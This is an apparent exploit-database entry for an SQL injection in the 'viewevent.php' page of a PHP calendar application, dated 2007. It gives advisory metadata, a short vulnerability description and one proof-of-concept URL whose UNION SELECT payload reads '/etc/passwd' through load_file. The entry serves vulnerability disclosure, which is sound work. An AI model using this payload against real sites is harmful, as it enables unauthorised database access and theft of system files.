Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection

Author: s0cratex
type: webapps
platform: php
port: 
date_added: 2007-08-27  
date_updated: 2013-12-27  
verified: 1  
codes: CVE-2007-4611;OSVDB-38438  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30533.txt  
source: https://www.securityfocus.com/bid/25456/info

Calendar Events is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*